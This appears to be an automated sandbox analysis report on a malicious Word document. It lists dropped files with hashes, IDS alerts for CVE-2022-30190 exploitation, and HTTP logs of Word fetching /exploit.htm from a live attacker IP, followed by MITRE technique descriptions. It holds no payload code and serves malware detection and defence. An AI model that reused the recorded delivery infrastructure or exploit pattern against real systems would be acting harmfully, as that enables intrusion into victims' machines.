SSDEEP:	48:I90P62VCDYx0Y59VYCG+stp0//PWZmVx77K5Y1VWMqDJQ/nbp0:ImlZz5nY+8IBEJQTp0
MD5:	985DDD0B25EBF55AE27458B1235FCEC6
SHA1:	5DB27EE086681CA58169ED02A82333A4CCC2466B
SHA-256:	678804E2C39F405A132A2CFC4DAC2A4855F10A98137C28CE6D3ABEACB2C7CB7B
SHA-512:	7668711CEBBD48C7E15905105477DB8D3EB292FCAEB7E15CDC3B689BE3DED9B83A3C420A66ED6BFBA860B51737985F08948D7D6837CC7CC27E2F210C09FC88FC
Malicious:	false
Preview:	...N.V._.beuHrs.1.2.._R.5..[.g.T.N ..s.^.y...g.e._R.;eeu..5..[.N....sQ..O\+.Y.SHa+.!..e.Y/..]Ha .sQ..O\&^jkbCS.Q+..v.l.QLe..Y.SHa+..b.Q._.h+.S_.gd.Q..!..e.Y&^:Nfk..5..Tw.5.%..0.S..MR.g.O.k...N,....NNfk.\.W,g../f}v.g..FO/f.N.e0R.N-N.g...W,g.Nz..z.4l..(W.T.s.k0R7..~.e.P.b.]Ha&^.N.~uQ..=\._GS.T.s.k...N5..[.NAS.~MR/fNNW...NAS.~.T^.8^:_.....TD..n.N.Y.v.\}v.~Kb.0../...5..[.N....sQ..+.sQ..O\+.O..^ .sQ..&^.{b_5.+.I.9..P.{..sQ..O\&^nc4l.eeh+.R..]uQ..O..^&^.Z..a..N+..~vQrlS.....NWYsQ.Y.v............................:...D...r...v...............................*.......4...6...................................................................................................................................................................................................................................................................................................................................gd.V6.....$.....-D..M............`...a$.gd.V6........-D..M............`...gd.V6................-D..M

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F2A88E0D-A9AE-4C78-97ED-928ECF332904}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{4EBE4D7B-7080-4C78-9E4E-C39E5F92BCD0}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.0255932170100285
Encrypted:	false
SSDEEP:	6:I3DPc1x60FvxggLRj6Aj0+lpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkxbpPvg+1vYg3J/
MD5:	AB727153D355FCB89A4DD0F778DB5504
SHA1:	88523811C7F9B235D6FE4B601E4C9DDB8070A72F
SHA-256:	56EF8D395A20E46295410DD854C67EE2AE49AFBDFF5F2D2EB27CA9A16481AA3C
SHA-512:	1594340344098975785F846B957888FB93E1FFC0F3A8EABC95834645C8D758F80AEB33BA4630C4F307A64F98ACAF8176C9BE9207C8744375C4560FFB2151C20B
Malicious:	false
Preview:	......M.eFy...z...q..K.t..z...S,...X.F...Fa.q............................t....WI.7h..............2....'G.....e.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{6B16DF9D-3276-41E2-93CB-F148AEE50BE1}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025545224349082966
Encrypted:	false
SSDEEP:	6:I3DPcrRvxggLR9QI+vAZ+pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPypQI+HHvYg3J/
MD5:	8B61E4E8242D0961EA9025B656A013E6
SHA1:	0A9C2887993588A0BA822A3F2159F8615CD6482B
SHA-256:	3D97D4A53F94F3D859C0488F5B3DB1C7177DC575485332BD693B3D6F7D53D98E
SHA-512:	3EE33B89CB9A6F36DADADADE7DA78826ADAAC65AF69A021D8F9C48E3E9CCAF16125EB6141D75B8277F907A5861D64B95B0745FCE2DF676160F9FDC8FB47C6292
Malicious:	false
Preview:	......M.eFy...zK...FhA....6..&S,...X.F...Fa.q............................W^...l.B.:...N;............$.l.N.....MD9.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ZDhoKQk8G6.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Wed Jun 15 13:11:14 2022, length=449949, window=hide
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	4.5762421575069645
Encrypted:	false
SSDEEP:	12:81l80gXg/XAlCPCHaXBKBnB/xQpX+WAclGaiEazjuicvb8X9M804TazNDtZ3Yil2:8Ak/XTRKJIKdthNeqM8aDv3qdwY7h
MD5:	32CF2F9FC38195E95F72206961AE587C
SHA1:	B9A93790175F263CA9264FE176C7A3939CE1E7C3
SHA-256:	D0AE07AF5C7F3745B60A89DE69F01D6039DCB11BA2357D20B4D17688D21DEB7B
SHA-512:	A38940EEE57924015DA87622A835B6BDFB60BE4C71CFA17E54634A52C5AAD58FC02711539DAFEF8DFC6591593F19487AC120F965F77AAFF9D2A97A2C9FC9AF00
Malicious:	false
Preview:	L..................F.... ...<...3..<...3..KQ...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2......Thq .ZDHOKQ~1.DOC..L......hT..hT.....r.....'...............Z.D.h.o.K.Q.k.8.G.6...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\374653\Users.user\Desktop\ZDhoKQk8G6.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Z.D.h.o.K.Q.k.8.G.6...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......374653..........D_....3N...W...9...N..... .....[D_....3N...W...9.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.824535814767059
Encrypted:	false
SSDEEP:	3:bDuMJlntd+pruYVomxW0hNxd+pruYVov:bCstMj7xMjy
MD5:	0B27580E2EF503551637D1B2B325B07C
SHA1:	B861428A3D29FD19167867B18E7C5A6B1C052F9B
SHA-256:	85D83675D7ADE632A4EE881D9F2C48C3B5AC1A4698800DB416BBACA7346FB2EB
SHA-512:	D8AF0CA7BE5345689B8ED4D26D64079E98EB75507FC41735464A85E449B70E8432B21F2ED0224A0B92F9B3616BFAF4C05AF7B0AA14ED23A810FA7EBF9F11E104
Malicious:	false
Preview:	[folders]..Templates.LNK=0..ZDhoKQk8G6.LNK=0..[misc]..ZDhoKQk8G6.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

C:\Users\user\Desktop\~$hoKQk8G6.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

Static File Info

General

File type:	Microsoft OOXML
Entropy (8bit):	7.994153126444351
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	ZDhoKQk8G6.docx
File size:	449949
MD5:	b64108b4dbb4cc0ceeca091289d3c3e6
SHA1:	ad1eb7107e76f8d75cdb2c3a8cc39179dd490ef0
SHA256:	52b48c4b2f4a63fc6611dea7e9146a440d41e306143788ea20c56c3ab292cf00
SHA512:	e3446e893cedc19a6b3dfb931d830f8467139f418fc851c47f638974dfe665cac8bea6decb5f15e087a9eb1a5c5bb59c63e4606f8f55b5ed1171ec4aed22d905
SSDEEP:	12288:LMLNbEnsH8SUY8ceFl3b0tZ80HxVcsg/DKkxOIB:gRbEnsH8AeFlr0tFRVcsMKkJB
TLSH:	10A423E102FAA020F6B1095377D3230769414A7EB8B5438DCE2B765F54E37E896B24CD
File Content Preview:	PK...........T....]...R.......[Content_Types].xml...j.0.E.....6.J.(.....e.h...4vD.BR^..Q..........{....p..[.......>..p+..K.=}..H."3.)k.$..d<...N7.B.j.J2..=S...4..u`.RY.Y.W_S.....>....[...<&.2..B..fok\nH..I......H..i..TxPaO..S...u.4b.+.1......t...G.R.x.N

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
117.48.146.246192.168.2.228008491782023942 06/15/22-07:10:36.033223	TCP	2023942	ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2	8008	49178	117.48.146.246	192.168.2.22
117.48.146.246192.168.2.228008491782036726 06/15/22-07:10:36.033223	TCP	2036726	ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)	8008	49178	117.48.146.246	192.168.2.22
117.48.146.246192.168.2.228008491782023941 06/15/22-07:10:36.033223	TCP	2023941	ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1	8008	49178	117.48.146.246	192.168.2.22
117.48.146.246192.168.2.228008491812023941 06/15/22-07:10:38.181098	TCP	2023941	ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1	8008	49181	117.48.146.246	192.168.2.22
117.48.146.246192.168.2.228008491812023942 06/15/22-07:10:38.181098	TCP	2023942	ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2	8008	49181	117.48.146.246	192.168.2.22
117.48.146.246192.168.2.228008491812036726 06/15/22-07:10:38.181098	TCP	2036726	ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)	8008	49181	117.48.146.246	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2022 07:10:20.092658043 CEST	49173	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:20.358961105 CEST	8008	49173	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:20.359108925 CEST	49173	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:20.359492064 CEST	49173	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:20.625736952 CEST	8008	49173	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:20.626101971 CEST	8008	49173	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:20.626133919 CEST	8008	49173	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:20.626219034 CEST	49173	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:20.626275063 CEST	49173	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:20.626656055 CEST	49173	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:20.892719030 CEST	8008	49173	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:26.894349098 CEST	49174	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:27.158770084 CEST	8008	49174	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:27.158993959 CEST	49174	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:27.159310102 CEST	49174	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:27.423584938 CEST	8008	49174	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:27.424031019 CEST	8008	49174	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:27.424055099 CEST	8008	49174	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:27.424156904 CEST	49174	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:27.425761938 CEST	49174	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:27.690138102 CEST	8008	49174	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:31.470498085 CEST	49175	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:31.725644112 CEST	8008	49175	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:31.725795984 CEST	49175	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:31.726026058 CEST	49175	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:31.981231928 CEST	8008	49175	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:31.981645107 CEST	8008	49175	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:31.981693029 CEST	8008	49175	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:31.981761932 CEST	49175	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:31.982180119 CEST	49175	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:32.237199068 CEST	8008	49175	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:34.445723057 CEST	49176	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:34.666729927 CEST	8008	49176	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:34.666924953 CEST	49176	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:34.670793056 CEST	49176	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:34.891483068 CEST	8008	49176	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:34.891915083 CEST	8008	49176	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:34.891959906 CEST	8008	49176	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:34.892024994 CEST	49176	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:34.892211914 CEST	49176	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:34.909142017 CEST	49177	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.112771988 CEST	8008	49176	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.182569981 CEST	8008	49177	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.182718039 CEST	49177	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.182955027 CEST	49177	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.456417084 CEST	8008	49177	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.456864119 CEST	8008	49177	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.456901073 CEST	8008	49177	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.456954002 CEST	49177	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.457007885 CEST	49177	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.519777060 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.730236053 CEST	8008	49177	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.775444984 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:35.775731087 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:35.776213884 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.032572985 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033222914 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033334970 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.033478975 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033510923 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033538103 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033565998 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033570051 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.033584118 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.033588886 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.033596992 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.033617020 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.033636093 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.038124084 CEST	49178	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.295587063 CEST	8008	49178	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.539437056 CEST	49179	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.804182053 CEST	8008	49179	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:36.804420948 CEST	49179	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:36.806541920 CEST	49179	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.071590900 CEST	8008	49179	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.072026968 CEST	8008	49179	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.072043896 CEST	8008	49179	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.072360039 CEST	49179	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.072402000 CEST	49179	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.135569096 CEST	49180	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.336937904 CEST	8008	49179	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.390664101 CEST	8008	49180	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.390815973 CEST	49180	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.390980005 CEST	49180	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.645345926 CEST	8008	49180	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.646136999 CEST	8008	49180	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.646164894 CEST	8008	49180	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.646297932 CEST	49180	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.646500111 CEST	49180	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.663650990 CEST	49181	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.900646925 CEST	8008	49180	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.921833992 CEST	8008	49181	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:37.921921968 CEST	49181	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:37.922209024 CEST	49181	8008	192.168.2.22	117.48.146.246
Jun 15, 2022 07:10:38.180035114 CEST	8008	49181	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:38.181097984 CEST	8008	49181	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:38.181127071 CEST	8008	49181	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:38.181153059 CEST	8008	49181	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:38.181178093 CEST	8008	49181	117.48.146.246	192.168.2.22
Jun 15, 2022 07:10:38.181200027 CEST	8008	49181	117.48.146.246	192.168.2.22

HTTP Request Dependency Graph

117.48.146.246:8008

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:20.359492064 CEST	1	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 117.48.146.246:8008 Content-Length: 0 Connection: Keep-Alive
Jun 15, 2022 07:10:20.626133919 CEST	2	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:20 GMT Content-Type: text/html Content-Length: 0 Allow: OPTIONS,GET,HEAD,POST

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49174	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:27.159310102 CEST	3	OUT	HEAD /exploit.htm HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 117.48.146.246:8008
Jun 15, 2022 07:10:27.424031019 CEST	3	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:27 GMT Content-Type: application/octet-stream Content-Length: 5982

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49175	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:31.726026058 CEST	3	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 117.48.146.246:8008
Jun 15, 2022 07:10:31.981645107 CEST	4	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:31 GMT Content-Type: text/html Content-Length: 0 Allow: OPTIONS,GET,HEAD,POST

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	117.48.146.246	8008	192.168.2.22	49176	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:34.891915083 CEST	4	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jun 2022 05:10:34 GMT Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	117.48.146.246	8008	192.168.2.22	49177	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:35.456864119 CEST	5	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jun 2022 05:10:35 GMT Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49178	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:35.776213884 CEST	6	OUT	GET /exploit.htm HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 117.48.146.246:8008 Connection: Keep-Alive
Jun 15, 2022 07:10:36.033222914 CEST	6	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:35 GMT Content-Type: application/octet-stream Content-Length: 5982

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49179	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:36.806541920 CEST	13	OUT	HEAD /exploit.htm HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 117.48.146.246:8008 Content-Length: 0 Connection: Keep-Alive
Jun 15, 2022 07:10:37.072026968 CEST	14	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:36 GMT Content-Type: application/octet-stream Content-Length: 5982

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49180	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:37.390980005 CEST	14	OUT	HEAD /exploit.htm HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 117.48.146.246:8008
Jun 15, 2022 07:10:37.646136999 CEST	14	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:37 GMT Content-Type: application/octet-stream Content-Length: 5982

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49181	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:37.922209024 CEST	15	OUT	GET /exploit.htm HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 117.48.146.246:8008 Connection: Keep-Alive
Jun 15, 2022 07:10:38.181097984 CEST	15	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:38 GMT Content-Type: application/octet-stream Content-Length: 5982

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49182	117.48.146.246	8008	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2022 07:10:38.896841049 CEST	22	OUT	HEAD /exploit.htm HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 117.48.146.246:8008 Content-Length: 0 Connection: Keep-Alive
Jun 15, 2022 07:10:39.150418043 CEST	22	IN	HTTP/1.1 200 OK Date: Wed, 15 Jun 2022 05:10:39 GMT Content-Type: application/octet-stream Content-Length: 5982

Target ID:	0
Start time:	07:11:14
Start date:	15/06/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f280000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
